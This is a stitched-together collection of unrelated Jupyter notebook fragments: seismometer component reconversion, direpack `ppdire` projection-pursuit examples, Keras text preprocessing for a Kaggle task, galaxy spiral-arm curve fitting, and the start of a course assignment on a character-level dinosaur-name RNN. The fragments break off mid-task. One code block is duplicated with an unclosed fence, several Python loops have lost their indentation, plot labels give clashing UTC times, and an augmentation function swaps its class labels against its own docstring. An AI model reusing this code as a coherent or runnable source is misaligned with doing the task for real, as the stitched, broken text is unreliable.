Check if the conversion was done correctly by reconverting back to Z,N,E and plotting each trace on top of its original. Then compute the residual (Z-Z1 etc.) for each pair of traces
```
%%time
Z1=np.zeros(numpoints)
N1=np.zeros(numpoints)
E1=np.zeros(numpoints)
ZR=np.zeros(numpoints)
NR=np.zeros(numpoints)
ER=np.zeros(numpoints)
for i in range (numpoints):
Z1[i]= w6*(w2*U[i]+w2*V[i]+w2*W[i])
N1[i]= w6*(w3*V[i]-w3*W[i])
E1[i]= w6*(-2*U[i]+V[i]+W[i])
ZR[i]=abs(Z[i]-Z1[i])
NR[i]=abs(N[i]-N1[i])
ER[i]=abs(E[i]-E1[i])
plt.plot (t,Z,color='black',label="Z")
plt.plot (t,Z1,color='green',label="Z reconv")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,N,color='black',label="N")
plt.plot (t,N1,color='red',label="N reconv")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,E,color='black',label="E")
plt.plot (t,E1,color='blue',label="E reconv")
plt.ylabel('Counts')
plt.xlabel("Seconds after 20:30:00 UTC")
plt.grid()
plt.legend()
plt.show()
#plot residual
plt.plot (t,ZR,color='green',label="residual Z")
plt.ylabel('Counts')
plt.xlabel("Seconds after 22:11:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,NR,color='red',label="residual N")
plt.ylabel('Counts')
plt.xlabel("Seconds after 22:11:00 UTC")
plt.grid()
plt.legend()
plt.show()
plt.plot (t,ER,color='blue',label="residual E")
plt.ylabel('Counts')
plt.xlabel("Seconds after 22:11:00 UTC")
plt.grid()
plt.legend()
plt.show()
```
How do Z,N,E look when one of the U,V,W sensors is down, i.e. its boom is stuck at one of its ends?
```
#select a time window of dt samples (3 s at the 100 Hz sampling rate)
dt=300
Ztest=np.zeros(dt)
Ntest=np.zeros(dt)
Etest=np.zeros(dt)
timetest=np.zeros(dt)
udown=599
vdown=1549
wdown=1099
#selecting a contiguous window of traces while U is down
for i in range (dt):
    idx=udown+i
    Ztest[i]=Z[idx]
    Ntest[i]=N[idx]
    Etest[i]=E[idx]
    timetest[i]=t[idx]
plt.plot(timetest,Ztest)
plt.plot(timetest,Ntest)
plt.plot(timetest,Etest)
plt.title ("U sensor down")
```
| github_jupyter |
`ppdire.py` subpackage: examples
================================
Here, we will illustrate how to use `ppdire.py` to perform different types of projection pursuit dimension reduction.
To run a toy example, start by sourcing packages and data:
```
# Load data
import pandas as ps
import numpy as np
data = ps.read_csv("../data/Returns_shares.csv")
columns = data.columns[2:8]
(n,p) = data.shape
datav = np.matrix(data.values[:,2:8].astype('float64'))
y = datav[:,0]
X = datav[:,1:5]
# Scale data
from direpack import VersatileScaler
centring = VersatileScaler()
Xs = centring.fit_transform(X)
```
1\. Comparison of PP estimates to Scikit-Learn
======================================
Let us first run `ppdire` to produce slow, approximate PP estimates of
PCA and PLS. This makes it easy to verify that the algorithm is correct.
1\.1\. PCA
--------------
By setting the projection index to variance, projection pursuit is a slow, approximate way to calculate PCA. Let's compare the `ppdire` results to `sklearn`'s.
- PCA ex `scikit-learn`
```
import sklearn.decomposition as skd
skpca = skd.PCA(n_components=4)
skpca.fit(Xs)
skpca.components_.T # sklearn outputs loadings as rows !
```
- PCA ex `ppdire`, using SLSQP optimization
```
from direpack import dicomo, ppdire
pppca = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'var'}, n_components=4, optimizer='SLSQP')
pppca.fit(X)
pppca.x_loadings_
```
- PCA ex `ppdire`, using its native `grid` algorithm optimization \[1\].
```
pppca = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'var'}, n_components=4, optimizer='grid',optimizer_options={'ndir':1000,'maxiter':1000})
pppca.fit(X)
pppca.x_loadings_
```
1\.2\. PLS
----------
Likewise, by setting the projection index to covariance, one obtains partial least squares.
- PLS ex `scikit-learn`
```
import sklearn.cross_decomposition as skc
skpls = skc.PLSRegression(n_components=4)
skpls.fit(Xs,(y-np.mean(y))/np.std(y))
skpls.x_scores_
print(skpls.coef_)
np.matmul(Xs,skpls.coef_)*np.std(y) + np.mean(y)
```
- PLS ex `ppdire`, using SLSQP optimization
```
pppls = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'cov'}, n_components=4, square_pi=True, optimizer='SLSQP', optimizer_options={'maxiter':500})
pppls.fit(X,y)
pppls.x_scores_
print(pppls.coef_scaled_) # Column 4 should agree with skpls.coef_
pppls.fitted_
```
- PLS ex `ppdire`, `grid` optimization
```
pppls = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'cov'}, n_components=4, square_pi=True, optimizer='grid',optimizer_options={'ndir':1000,'maxiter':1000})
pppls.fit(X,y)
pppls.x_scores_
print(pppls.coef_scaled_) # Column 4 should agree with skpls.coef_
pppls.fitted_
```
Remark: Dimension Reduction techniques based on projection onto latent variables,
such as PCA, PLS and ICA, are sign indeterminate with respect to the components.
Therefore, signs of estimates by different algorithms can be opposed, yet the
absolute values should be identical up to algorithm precision. Here, this implies
that `sklearn` and `ppdire`'s `x_scores_` and `x_loadings_` can have opposed signs,
yet the coefficients and fitted responses should be identical.
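A minimal numpy check of what "identical up to sign" means in practice (illustrative values, not output from the fits above):

```python
import numpy as np

# Two algorithms may return the same loading vector with opposite orientation
v1 = np.array([[0.8], [-0.6]])
v2 = -v1  # same axis, flipped sign

# Compare components up to sign via their absolute values
same_up_to_sign = np.allclose(np.abs(v1), np.abs(v2))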
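A minimal numpy check of what "identical up to sign" means in practice (illustrative values, not output from the fits above):

```python
import numpy as np

# Two algorithms may return the same loading vector with opposite orientation
v1 = np.array([[0.8], [-0.6]])
v2 = -v1  # same axis, flipped sign

# Compare components up to sign via their absolute values
same_up_to_sign = np.allclose(np.abs(v1), np.abs(v2))
```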
2\. Robust projection pursuit estimators
=================================
Note that optimization through `scipy.optimize` is much more efficient than the native `grid` algorithm, yet will only provide correct results for classical projection indices. The native `grid` algorithm should be used when
the projection index involves order statistics of any kind, such as ranks, trimming, winsorizing, or empirical quantiles.
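As a tiny standalone illustration of such an index (a hypothetical `trimmed_var` helper, not `dicomo`'s implementation): trimming discards the observations farthest from the median before the variance is computed, which makes the index depend on order statistics and hence unsuitable for smooth optimizers:

```python
import numpy as np

def trimmed_var(x, trimming=0.1):
    # Drop the fraction `trimming` of points farthest from the median,
    # then compute an ordinary variance on what remains
    dev = np.abs(x - np.median(x))
    keep = dev <= np.quantile(dev, 1 - trimming)
    return np.var(x[keep])

x = np.concatenate([np.zeros(9), [100.0]])  # one gross outlier
plain, robust = np.var(x), trimmed_var(x)   # the outlier dominates the plain variance
```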
- Robust PCA based on the Median Absolute Deviation (MAD) \[3\].
```
lcpca = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'var', 'center': 'median'}, n_components=4, optimizer='grid',optimizer_options={'ndir':1000,'maxiter':10})
#set a higher maxiter for convergence and precision!
lcpca.fit(X)
lcpca.x_loadings_
```
To extend to Robust PCR, just add `y`:
```
lcpca.fit(X,y,regopt='robust')
```
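For reference, the MAD used as a robust scale above is simple to compute on its own; a quick standalone check (not `direpack` code) of why it resists the outlier that inflates the standard deviation:

```python
import numpy as np

x = np.array([1.0, 2.0, 2.0, 3.0, 100.0])   # one gross outlier
mad = np.median(np.abs(x - np.median(x)))   # robust scale: barely affected
std = x.std()                               # classical scale: blown up
```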
- Robust Continuum Regression \[4\] based on trimmed continuum association:
```
rcr = ppdire(projection_index = dicomo, pi_arguments = {'mode' : 'continuum'}, n_components=4, trimming=.1, alpha=.5, optimizer='grid',optimizer_options={'ndir':250,'maxiter':1000})
rcr.fit(X,y=y,regopt='robust')
rcr.x_loadings_
rcr.x_scores_
rcr.coef_scaled_
rcr.predict(X[:2666])
```
Let us now plot the results. The `plot` subpackage contains a plotting function for `ppdire`. To plot predicted vs. actual values:
```
from direpack import ppdire_plot
dr_plot=ppdire_plot(rcr,['w','w','g','y','m','b','k'])
dr_plot.plot_yyp(label='KMB',title='fitted vs true quotation, training set')
dr_plot.plot_yyp(ytruev=y[2666:],Xn=X[2666:],label='KMB',title='fitted vs true quotation, test set')
```
To plot scores:
```
dr_plot.plot_projections(Xn=X[2666:],label='KMB',title='fitted vs true quotation, test set')
```
3\. Projection pursuit generalized betas
================================
Generalized betas are obtained as the projection pursuit weights using the
co-moment analysis projection index (CAPI) \[2\].
```
from direpack import capi
est = ppdire(projection_index = capi, pi_arguments = {'max_degree' : 3,'projection_index': dicomo, 'scaling': False}, n_components=1, trimming=0,center_data=True,scale_data=True)
est.fit(X,y=y,ndir=200)
est.x_weights_
```
Note that these data aren't the greatest illustration. Evaluating CAPI projections makes more sense if `y` is a market index, e.g. SPX.
4\. Cross-validating through `scikit-learn`
===========================================
The `ppdire` class is 100% compatible with `scikit-learn`, which allows, for instance, hyperparameter tuning through `GridSearchCV`.
To try it out, uncomment the lines below and run (this may take some time).
```
# Uncomment to try out:
# from sklearn.model_selection import GridSearchCV
# rcr_cv = GridSearchCV(ppdire(projection_index=dicomo,
# pi_arguments = {'mode' : 'continuum'
# },
# optimizer = 'grid',
# optimizer_options = {'ndir':1000,'maxiter':1000}
# ),
# cv=10,
# param_grid={"n_components": [1, 2, 3],
# "alpha": np.arange(.1,3,.3).tolist(),
# "trimming": [0, .15]
# }
# )
# rcr_cv.fit(X[:2666],y[:2666])
# rcr_cv.best_params_
# rcr_cv.predict(X[2666:])
```
5\. Data compression
=================
While `ppdire` is very flexible and can project according to a very wide variety
of projection indices, it can be computationally demanding. For flat data tables,
a workaround has been built in. Note, however, that running the code in the next cell can still take quite some time.
```
# Load flat data
datan = ps.read_csv("../data/Glass_df.csv")
X = datan.values[:,100:300]
y = datan.values[:,2]
# Now compare
rcr = ppdire(projection_index = dicomo,
pi_arguments = {'mode' : 'continuum'},
n_components=4,
trimming=.1,
alpha=.5,
compression = False,
optimizer='grid',
optimizer_options={'ndir':1000,'maxiter':1000})
rcr.fit(X,y)
print(rcr.coef_)
rcr = ppdire(projection_index = dicomo,
pi_arguments = {'mode' : 'continuum'},
n_components=4,
trimming=.1,
alpha=.5,
compression = True,
optimizer='grid',
optimizer_options={'ndir':1000,'maxiter':1000})
rcr.fit(X,y)
rcr.coef_
```
However, compression will not work properly if the data contain several low-scale
variables. In this example, it will not work for `X = datan.values[:,8:751]`. This
will throw a warning, and `ppdire` will continue without compression.
References
----------------
1. [Robust Multivariate Methods: The Projection Pursuit Approach](https://link.springer.com/chapter/10.1007/3-540-31314-1_32), Peter Filzmoser, Sven Serneels, Christophe Croux and Pierre J. Van Espen, in: From Data and Information Analysis to Knowledge Engineering, Spiliopoulou, M., Kruse, R., Borgelt, C., Nuernberger, A. and Gaul, W., eds., Springer Verlag, Berlin, Germany, 2006, pages 270--277.
2. [Projection pursuit based generalized betas accounting for higher order co-moment effects in financial market analysis](https://arxiv.org/pdf/1908.00141.pdf), Sven Serneels, in: JSM Proceedings, Business and Economic Statistics Section. Alexandria, VA: American Statistical Association, 2019, 3009-3035.
3. Robust principal components and dispersion matrices via projection pursuit, Chen, Z. and Li, G., Research Report, Department of Statistics, Harvard University, 1981.
4. [Robust Continuum Regression](https://www.sciencedirect.com/science/article/abs/pii/S0169743904002667), Sven Serneels, Peter Filzmoser, Christophe Croux, Pierre J. Van Espen, Chemometrics and Intelligent Laboratory Systems, 76 (2005), 197-204.
Test data preprocessing
```
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
import time
import random
from tqdm import tqdm
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.model_selection import GridSearchCV, StratifiedKFold
from sklearn.metrics import f1_score, roc_auc_score
from collections import Counter
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
data_dir = "../input/"
train_file = os.path.join(data_dir, "train.csv")
test_file = os.path.join(data_dir, "test.csv")
embedding_size = 300
max_len = 50
max_features = 100000
batch_size = 256
train_df = pd.read_csv(train_file)
# test_df = pd.read_csv(test_file)
print("Train shape : ",train_df.shape)
# print("Test shape : ",test_df.shape)
# data cleaning
train_df["question_text"] = train_df["question_text"].str.lower()
# test_df["question_text"] = test_df["question_text"].str.lower()
## fill up the missing values
train_X = train_df["question_text"].fillna("_NA_").values
# test_X = test_df["question_text"].fillna("_##_").values
train_X[:5]
# # Add 30 stop words
# filters = []
# standard_filters = '!"#$%&()*+,-./:;<=>?@[\]^_`{|}~\t\n'
# for s in standard_filters:
# filters.append(s)
# stop_words = ['does', 'a', 'that', 'to', 'or', 'in', 'if', 'the', 'how', 'can', 'have', 'and', 'of', 'what', 'you', 'be', 'from', 'an',\
# 'why', 'on', 'with', 'which', 'are', 'your', 'do', 'my', 'i', 'is', 'it', 'for']
# filters.extend(stop_words)
# print(filters)
tokenizer = Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(list(train_X))
train_X = tokenizer.texts_to_sequences(train_X)
train_Y = train_df['target'].values
print(np.sum(train_Y))
# remove_words = []
# for x in train_X:
# remove_words.append([i for i in x if i>40])
# train_X = remove_words
train_X[:5]
DATA_SPLIT_SEED = 2018
splits = list(StratifiedKFold(n_splits=5, shuffle=True, random_state=DATA_SPLIT_SEED).split(train_X, train_Y))
for x in train_X:
if len(x) == 0:
print(x)
# Undersample positives, augment negatives by shuffling word order
def data_augmentation(X, Y, under_sample=200000, aug=2):
    """
    under_sample: number of positive samples to drop (undersampling)
    aug: augmentation factor for the negative class
    """
    pos_X = []
    neg_X = []
    for i in range(len(X)):
        if Y[i] == 1:
            neg_X.append(X[i])
        else:
            pos_X.append(X[i])
    # Undersample the positive class
    random.shuffle(pos_X)
    pos_X = pos_X[:-under_sample]
    # Augment the negative class with independently shuffled copies
    # (copy before shuffling, so the originals and the copies all differ)
    neg_X2 = []
    for x in neg_X:
        for _ in range(aug):
            shuffled = list(x)
            random.shuffle(shuffled)
            neg_X2.append(shuffled)
    neg_X.extend(neg_X2)
    pos_Y = np.zeros(shape=[len(pos_X)], dtype=np.int32)
    neg_Y = np.ones(shape=[len(neg_X)], dtype=np.int32)
    return pos_X + neg_X, np.append(pos_Y, neg_Y)
train_X, train_Y = data_augmentation(train_X, train_Y)
index = 0
for x in train_X:
index += 1
if len(x)==0:
print(x)
index
len_num = 0
for x in train_X:
if len(x)>=20:
len_num += 1
len_num
tokenizer.texts_to_sequences(np.array(['dsjdhsjhdsdh make love']))
def get_key(d, value):
    # Return all words whose tokenizer index is <= value (i.e. the most frequent ones)
    return [k for k, v in d.items() if v <= value]
print(get_key(tokenizer.word_index, 30))
train_X = pad_sequences(train_X, maxlen=max_len, padding="post", truncating="post")
train_X[:5]
train_X = np.where(train_X>=40, train_X, 0)
train_X[:5]
```
```
%load_ext autoreload
%autoreload 2
%matplotlib inline
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from gzbuilderspirals import r_theta_from_xy, xy_from_r_theta
import lib.galaxy_utilities as gu
from gzbuilderspirals import fitting
with open('./lib/subject-id-list.csv', 'r') as f:
subjectIds = np.array([int(n) for n in f.read().split('\n')])
chosenId = 21097008 #subjectIds[0]
# chosenId = 21686558
gal, angle = gu.get_galaxy_and_angle(chosenId)
pic_array, deprojected_image = gu.get_image(
gal, chosenId, angle
)
galaxy_object = gu.get_galaxy_spirals(
gal, angle, chosenId, gu.classifications
)
# which arm should we work on?
armN = 0
deprojected_arm = galaxy_object.deproject_arms()[armN]
plt.figure(0, [8]*2)
for arm in deprojected_arm.drawn_arms:
    plt.plot(*arm.T, '.-')
R, t = deprojected_arm.unwrap_and_sort()
a = np.argsort(R)
plt.plot(R, t, '.')
plt.ylabel('Theta')
plt.xlabel('Radius from center')
fitting_result = deprojected_arm.fit()
fitting_result.keys()
def recursiveDictExplore(d):
if type(d) != dict:
return str(type(d))
k = d.keys()
return {i: recursiveDictExplore(d[i]) for i in k}
# __import__('pprint').pprint(recursiveDictExplore(fitting_result))
fitting_result['clf']
sample_weights = deprojected_arm.get_sample_weight(R)
# plt.plot(R, sample_weights)
log_spiral = fitting.log_spiral_fit(R, t, sample_weight=sample_weights)
plt.plot(R, t, '.', markersize=2)
plt.plot(log_spiral['R'], log_spiral['T'])
plt.fill_between(
log_spiral['R'],
log_spiral['T'] - log_spiral['T_std'],
log_spiral['T'] + log_spiral['T_std'],
color='k', alpha=0.2
)
plt.ylabel(r'Spiral arm $\theta$')
plt.xlabel('Radius from center')
plt.xscale('log')
plt.title('Log Spiral fit, AIC: {}, BIC: {}'.format(log_spiral['AIC'], log_spiral['BIC']))
plt.ylim(min(t)-0.5, max(t)+0.5)
polynomials = fitting.get_polynomial_fits(R, t)
plt.figure(figsize=(8, 8))
plt.plot([i['k'] for i in polynomials], [i['AIC'] for i in polynomials], label='AIC')
plt.plot([i['k'] for i in polynomials], [i['BIC'] for i in polynomials], label='BIC')
plt.plot([2], [log_spiral['AIC']], 'x', markersize=10, label='Log Spiral AIC')
plt.plot([2], [log_spiral['BIC']], 'x', markersize=10, label='Log Spiral BIC')
best_aic = polynomials[np.argmin([i['AIC'] for i in polynomials])]
plt.plot([best_aic['k']], [best_aic['AIC']], 'o', markersize=10, label='Best polynomial AIC')
best_bic = polynomials[np.argmin([i['BIC'] for i in polynomials])]
plt.plot([best_bic['k']], [best_bic['BIC']], 'o', markersize=10, label='Best polynomial BIC')
plt.legend()
_ = plt.xticks([i['k'] for i in polynomials])
logSpiral_xy = xy_from_r_theta(log_spiral['R'], log_spiral['T'])
poly_best_aic_xy = xy_from_r_theta(best_aic['R'], best_aic['T'])
poly_aic_lower_xy = xy_from_r_theta(best_aic['R'], best_aic['T'] - best_aic['T_std'])
poly_aic_upper_xy = xy_from_r_theta(best_aic['R'], best_aic['T'] + best_aic['T_std'])
poly_best_bic_xy = xy_from_r_theta(best_bic['R'], best_bic['T'])
poly_bic_lower_xy = xy_from_r_theta(best_bic['R'], best_bic['T'] - best_bic['T_std'])
poly_bic_upper_xy = xy_from_r_theta(best_bic['R'], best_bic['T'] + best_bic['T_std'])
plt.figure(figsize=(15, 7))
plt.subplot(121)
plt.plot(R, t, '.', markersize=2)
# plot the log spiral
plt.plot(log_spiral['R'], log_spiral['T'], linewidth=2)
plt.fill_between(
log_spiral['R'],
log_spiral['T'] - log_spiral['T_std'],
log_spiral['T'] + log_spiral['T_std'],
color='C1', alpha=0.2
)
# plot the best polynomial (selected using AIC)
plt.plot(best_aic['R'], best_aic['T'], linewidth=2)
plt.fill_between(
best_aic['R'],
best_aic['T'] - best_aic['T_std'],
best_aic['T'] + best_aic['T_std'],
color='C2', alpha=0.2
)
plt.ylim(min(t)-0.5, max(t)+0.5)
plt.ylabel(r'Spiral arm $\theta$')
plt.xlabel('Radius from center')
plt.subplot(122)
plt.plot(*xy_from_r_theta(R, t), '.', markersize=2)
plt.plot(*logSpiral_xy,
linewidth=2, label='Log spiral')
plt.plot(*poly_best_aic_xy,
linewidth=2, label='Best AIC polynomial ($k={}$)'.format(best_aic['k']))
plt.plot(*poly_aic_lower_xy, '.-', c='C3', alpha=0.5)
plt.plot(*poly_aic_upper_xy, '.-', c='C3', alpha=0.5)
plt.plot(*poly_best_bic_xy,
'--', linewidth=2, label='Best BIC polynomial ($k={}$)'.format(best_bic['k']))
plt.legend()
plt.axis('equal')
plt.figure(0, [8]*2)
plt.imshow(deprojected_image, cmap='gray_r', origin='lower')
plt.plot(*deprojected_arm.cleaned_cloud.T, '.', markersize=2, alpha=0.1)
plt.plot(*deprojected_arm.de_normalise(np.array(logSpiral_xy)))
plt.plot(*deprojected_arm.de_normalise(np.array(poly_best_aic_xy)))
```
And there we are, splines, plots and AIC
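For reference, a self-contained sketch of how such information criteria trade fit against complexity (assuming Gaussian residuals; this is illustrative, not the `fitting` module's exact definition). Overfitting a truly linear signal with a degree-9 polynomial shrinks the residuals a little, but both criteria penalise the extra coefficients:

```python
import numpy as np

def aic_bic(y, y_fit, n_params):
    # Gaussian log-likelihood at the maximum-likelihood variance estimate rss/n
    n = len(y)
    rss = np.sum((y - y_fit) ** 2)
    ll = -0.5 * n * (np.log(2 * np.pi * rss / n) + 1)
    return 2 * n_params - 2 * ll, n_params * np.log(n) - 2 * ll

rng = np.random.default_rng(0)
x = np.linspace(0, 1, 100)
y = 2 * x + rng.normal(scale=0.1, size=x.size)        # truly linear data
fit = {k: np.polyval(np.polyfit(x, y, k), x) for k in (1, 9)}
aic1, bic1 = aic_bic(y, fit[1], 1 + 2)                # k+1 coefficients plus noise variance
aic9, bic9 = aic_bic(y, fit[9], 9 + 2)
```

Here the degree-1 fit should win on BIC, mirroring the model-selection plot above.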
```
plt.plot(*deprojected_arm.get_r_bin_weights(deprojected_arm.drawn_arms))
# plt.plot(r_bins, z)  # r_bins and z are not defined in this notebook
```
# Character level language model - Dinosaurus Island
Welcome to Dinosaurus Island! 65 million years ago, dinosaurs existed, and in this assignment they are back. You are in charge of a special task. Leading biology researchers are creating new breeds of dinosaurs and bringing them to life on earth, and your job is to give names to these dinosaurs. If a dinosaur does not like its name, it might go berserk, so choose wisely!
<table>
<td>
<img src="images/dino.jpg" style="width:250px;height:300px;">
</td>
</table>
Luckily you have learned some deep learning and you will use it to save the day. Your assistant has collected a list of all the dinosaur names they could find, and compiled them into this [dataset](dinos.txt). (Feel free to take a look by clicking the previous link.) To create new dinosaur names, you will build a character level language model to generate new names. Your algorithm will learn the different name patterns, and randomly generate new names. Hopefully this algorithm will keep you and your team safe from the dinosaurs' wrath!
By completing this assignment you will learn:
- How to store text data for processing using an RNN
- How to synthesize data, by sampling predictions at each time step and passing it to the next RNN-cell unit
- How to build a character-level text generation recurrent neural network
- Why clipping the gradients is important
We will begin by loading in some functions that we have provided for you in `rnn_utils`. Specifically, you have access to functions such as `rnn_forward` and `rnn_backward` which are equivalent to those you've implemented in the previous assignment.
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "3a".
* You can find your original work saved in the notebook with the previous version name ("v3")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates
* Sort and print `chars` list of characters.
* Import and use pretty print
* `clip`:
- Additional details on why we need to use the "out" parameter.
- Modified for loop to have students fill in the correct items to loop through.
- Added a test case to check for hard-coding error.
* `sample`
- additional hints added to steps 1,2,3,4.
- "Using 2D arrays instead of 1D arrays".
- explanation of numpy.ravel().
- fixed expected output.
- clarified comments in the code.
* "training the model"
- Replaced the sample code with explanations for how to set the index, X and Y (for a better learning experience).
* Spelling, grammar and wording corrections.
```
import numpy as np
from utils import *
import random
import pprint
```
## 1 - Problem Statement
### 1.1 - Dataset and Preprocessing
Run the following cell to read the dataset of dinosaur names, create a list of unique characters (such as a-z), and compute the dataset and vocabulary size.
```
data = open('dinos.txt', 'r').read()
data = data.lower()
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print('There are %d total characters and %d unique characters in your data.' % (data_size, vocab_size))
```
* The characters are a-z (26 characters) plus the "\n" (or newline character).
* In this assignment, the newline character "\n" plays a role similar to the `<EOS>` (or "End of sentence") token we had discussed in lecture.
- Here, "\n" indicates the end of the dinosaur name rather than the end of a sentence.
* `char_to_ix`: In the cell below, we create a python dictionary (i.e., a hash table) to map each character to an index from 0-26.
* `ix_to_char`: We also create a second python dictionary that maps each index back to the corresponding character.
- This will help you figure out what index corresponds to what character in the probability distribution output of the softmax layer.
```
chars = sorted(chars)
print(chars)
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(ix_to_char)
```
### 1.2 - Overview of the model
Your model will have the following structure:
- Initialize parameters
- Run the optimization loop
- Forward propagation to compute the loss function
- Backward propagation to compute the gradients with respect to the loss function
- Clip the gradients to avoid exploding gradients
- Using the gradients, update your parameters with the gradient descent update rule.
- Return the learned parameters
<img src="images/rnn.png" style="width:450px;height:300px;">
<caption><center> **Figure 1**: Recurrent Neural Network, similar to what you had built in the previous notebook "Building a Recurrent Neural Network - Step by Step". </center></caption>
* At each time-step, the RNN tries to predict what is the next character given the previous characters.
* The dataset $\mathbf{X} = (x^{\langle 1 \rangle}, x^{\langle 2 \rangle}, ..., x^{\langle T_x \rangle})$ is a list of characters in the training set.
* $\mathbf{Y} = (y^{\langle 1 \rangle}, y^{\langle 2 \rangle}, ..., y^{\langle T_x \rangle})$ is the same list of characters but shifted one character forward.
* At every time-step $t$, $y^{\langle t \rangle} = x^{\langle t+1 \rangle}$. The prediction at time $t$ is the same as the input at time $t + 1$.
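To make the shift concrete, here is a tiny standalone example (the name and mapping are made up for illustration):

```python
# Build one training example where Y is X shifted forward by one character
name = "trex"
char_to_ix = {ch: i for i, ch in enumerate(sorted(set(name + "\n")))}
X = [None] + [char_to_ix[ch] for ch in name]   # None stands in for the initial zero input
Y = X[1:] + [char_to_ix["\n"]]                 # y<t> = x<t+1>, ending with "\n"
```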
## 2 - Building blocks of the model
In this part, you will build two important blocks of the overall model:
- Gradient clipping: to avoid exploding gradients
- Sampling: a technique used to generate characters
You will then apply these two functions to build the model.
### 2.1 - Clipping the gradients in the optimization loop
In this section you will implement the `clip` function that you will call inside of your optimization loop.
#### Exploding gradients
* When gradients are very large, they're called "exploding gradients."
* Exploding gradients make the training process more difficult, because the updates may be so large that they "overshoot" the optimal values during back propagation.
Recall that your overall loop structure usually consists of:
* forward pass,
* cost computation,
* backward pass,
* parameter update.
Before updating the parameters, you will perform gradient clipping to make sure that your gradients are not "exploding."
#### Gradient clipping
In the exercise below, you will implement a function `clip` that takes in a dictionary of gradients and returns a clipped version of gradients if needed.
* There are different ways to clip gradients.
* We will use a simple element-wise clipping procedure, in which every element of the gradient vector is clipped to lie between some range [-N, N].
* For example, if N=10
- The range is [-10, 10]
- If any component of the gradient vector is greater than 10, it is set to 10.
- If any component of the gradient vector is less than -10, it is set to -10.
- If any components are between -10 and 10, they keep their original values.
<img src="images/clip.png" style="width:400px;height:150px;">
<caption><center> **Figure 2**: Visualization of gradient descent with and without gradient clipping, in a case where the network is running into "exploding gradient" problems. </center></caption>
**Exercise**:
Implement the function below to return the clipped gradients of your dictionary `gradients`.
* Your function takes in a maximum threshold and returns the clipped versions of the gradients.
* You can check out [numpy.clip](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.clip.html).
- You will need to use the argument "`out = ...`".
- Using the "`out`" parameter allows you to update a variable "in-place".
- If you don't use "`out`" argument, the clipped variable is stored in the variable "gradient" but does not update the gradient variables `dWax`, `dWaa`, `dWya`, `db`, `dby`.
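A quick standalone illustration of the difference:

```python
import numpy as np

g = np.array([12.0, -3.0, -15.0])
clipped = np.clip(g, -10, 10)      # returns a new array; g is unchanged
np.clip(g, -10, 10, out=g)         # clips in place; g itself is modified
```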
```
### GRADED FUNCTION: clip
def clip(gradients, maxValue):
    '''
    Clips the gradients' values between minimum and maximum.
    Arguments:
    gradients -- a dictionary containing the gradients "dWaa", "dWax", "dWya", "db", "dby"
    maxValue -- everything above this number is set to this number, and everything less than -maxValue is set to -maxValue
    Returns:
    gradients -- a dictionary with the clipped gradients.
    '''
    dWaa, dWax, dWya, db, dby = gradients['dWaa'], gradients['dWax'], gradients['dWya'], gradients['db'], gradients['dby']
    ### START CODE HERE ###
    # clip to mitigate exploding gradients, loop over [dWax, dWaa, dWya, db, dby]. (≈2 lines)
    for gradient in [dWax, dWaa, dWya, db, dby]:
        np.clip(gradient, -maxValue, maxValue, out=gradient)
    ### END CODE HERE ###
    gradients = {"dWaa": dWaa, "dWax": dWax, "dWya": dWya, "db": db, "dby": dby}
    return gradients
# Test with a maxvalue of 10
maxValue = 10
np.random.seed(3)
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, maxValue)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
```
** Expected output:**
```Python
gradients["dWaa"][1][2] = 10.0
gradients["dWax"][3][1] = -10.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 10.]
gradients["dby"][1] = [ 8.45833407]
```
```
# Test with a maxValue of 5
maxValue = 5
np.random.seed(3)
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, maxValue)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
```
** Expected Output: **
```Python
gradients["dWaa"][1][2] = 5.0
gradients["dWax"][3][1] = -5.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 5.]
gradients["dby"][1] = [ 5.]
```
### 2.2 - Sampling
Now assume that your model is trained. You would like to generate new text (characters). The process of generation is explained in the picture below:
<img src="images/dinos3.png" style="width:500px;height:300px;">
